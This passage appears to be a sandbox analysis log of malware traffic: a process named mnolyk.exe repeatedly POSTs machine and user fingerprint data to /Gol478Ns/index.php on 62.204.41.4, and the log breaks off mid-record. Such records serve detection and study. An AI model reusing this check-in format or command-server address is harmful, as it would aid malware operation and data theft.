                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        477 | 192.168.2.5 | 50167 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:57.212251902 CET | 677 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.275357962 CET | 678 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        478 | 192.168.2.5 | 50168 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:57.456115007 CET | 678 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.522361994 CET | 679 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        479 | 192.168.2.5 | 50169 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:57.700716019 CET | 679 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.764674902 CET | 680 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        48 | 192.168.2.5 | 49738 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:52.550399065 CET | 249 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.614141941 CET | 249 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        480 | 192.168.2.5 | 50170 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:57.930319071 CET | 680 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.992721081 CET | 681 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        481 | 192.168.2.5 | 50171 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:58.166615963 CET | 681 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.233177900 CET | 682 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        482 | 192.168.2.5 | 50172 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:58.399243116 CET | 682 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.462138891 CET | 683 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        483 | 192.168.2.5 | 50173 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:58.637896061 CET | 683 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.705470085 CET | 684 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        484 | 192.168.2.5 | 50174 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:58.884943008 CET | 684 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:58.947803974 CET | 685 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        485 | 192.168.2.5 | 50175 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:59.121879101 CET | 685 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.186496019 CET | 686 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        486 | 192.168.2.5 | 50176 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:59.358931065 CET | 686 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.424455881 CET | 687 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        487 | 192.168.2.5 | 50177 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:59.607120991 CET | 687 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.670885086 CET | 688 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        488 | 192.168.2.5 | 50178 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:59.843879938 CET | 688 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:59.905893087 CET | 689 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        489 | 192.168.2.5 | 50179 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:00.072206974 CET | 689 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.137847900 CET | 690 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        49 | 192.168.2.5 | 49739 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:52.782773972 CET | 250 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.847732067 CET | 250 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        490 | 192.168.2.5 | 50180 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:00.308509111 CET | 690 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.373677015 CET | 691 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        491 | 192.168.2.5 | 50181 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:00.557837009 CET | 691 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.622848034 CET | 692 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        492 | 192.168.2.5 | 50182 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:00.788880110 CET | 692 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:00.851037979 CET | 693 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        493 | 192.168.2.5 | 50183 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:19:01.029659033 CET | 693 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:19:01.094944000 CET | 694 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:19:01 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        494 | 192.168.2.5 | 50184 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
